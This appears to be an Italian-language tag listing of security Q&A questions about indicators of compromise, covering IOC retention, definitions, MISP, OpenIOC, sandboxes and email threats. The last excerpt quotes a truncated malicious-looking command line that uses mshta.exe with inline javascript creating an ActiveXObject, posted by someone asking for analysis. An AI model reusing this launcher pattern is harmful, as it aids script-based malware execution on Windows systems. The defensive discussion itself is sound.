Domande con tag 'ioc'

4
risposte

Indicatore dei periodi effettivi di compromesso [chiuso]

Per quanto tempo dovrebbero essere monitorati IOC anche se potrebbero essere "obsoleti"? Ci sono buone pratiche o altri ragionamenti? Penserei che monitorare gli IOC indefinitamente non sia l'ideale. Forse 90 giorni sarebbero sufficienti?...
posta 04.09.2018 - 10:49
1
risposta

Qual è un indicatore di compromesso?

Sto facendo fatica a capire che cosa è un indicatore di compromesso. Ho trovato diverse definizioni sul web ma non lo so ancora. Le definizioni che ho trovato sono: 1 - Qualcosa (file, connessione di rete) che indica che un sistema è stato...
posta 03.01.2018 - 19:11
1
risposta

Indicatore di compromesso - Mozilla Firefox - Malware Redirect [closed]

Ho uno strano problema in cui trascinare e rilasciare un'e-mail su una finestra di Mozilla Firefox reindirizza la prima scheda a uno dei vari siti Web e la seconda scheda si apre con del testo dal messaggio nella barra degli indirizzi. È stato i...
posta 30.11.2017 - 00:36
0
risposte

sandboxing IoC e firme

Le sandbox vengono utilizzate per l'estrazione automatica di indicatori di compromissione (IoC) che possono essere utilizzati per scrivere firme. Questa firma può quindi essere utilizzata, ad esempio, su un sistema IPS per bloccare determinate a...
posta 22.11.2018 - 13:37
1
risposta

Quando modellare un concetto tramite oggetto vs tassonomia vs galassia in MISP?

Le tassonomie in MISP sono un triplo di (namespace, predicate, value) riferito a "machinetags". Le galassie sembrano essere simili. I documenti della galassia MISP affermano che MISP galaxy is a simple method to express a large obje...
posta 03.04.2018 - 23:18
0
risposte

RegistryItem IndicatorItems in OpenIOC - quali livelli sono richiesti

Ho visto persone specificare RegistryItem/KeyPath, RegistryItem/ValueName, RegistryItem/Value per specificare completamente il valore di una voce del Registro di sistema, mentre altri solo usano RegistryItem/Path, RegistryItem/Te...
posta 07.11.2015 - 02:27
1
risposta

indicatori di compromesso tramite server di posta elettronica

I file dannosi vengono comunemente infiltrati nella rete tramite allegati e-mail. Oltre a sensibilizzare ed educare il mio staff ad astenersi dal cliccare sugli allegati sospetti, vorrei anche migliorare la postura della sicurezza tramite la tec...
posta 10.07.2015 - 02:57
1
risposta

Come leggere l'argomento della riga di comando per un potenziale problema

Ho un IOC che ha un argomento da riga di comando che appare di seguito. Volevo vedere se qualcuno poteva aiutarmi a analizzarlo un po 'per capire cosa stava succedendo. C:\Windows\System32\mshta.exe javascript:GO3sOtu=BN1;Z0y=new%20ActiveXObje...
posta 10.07.2017 - 23:02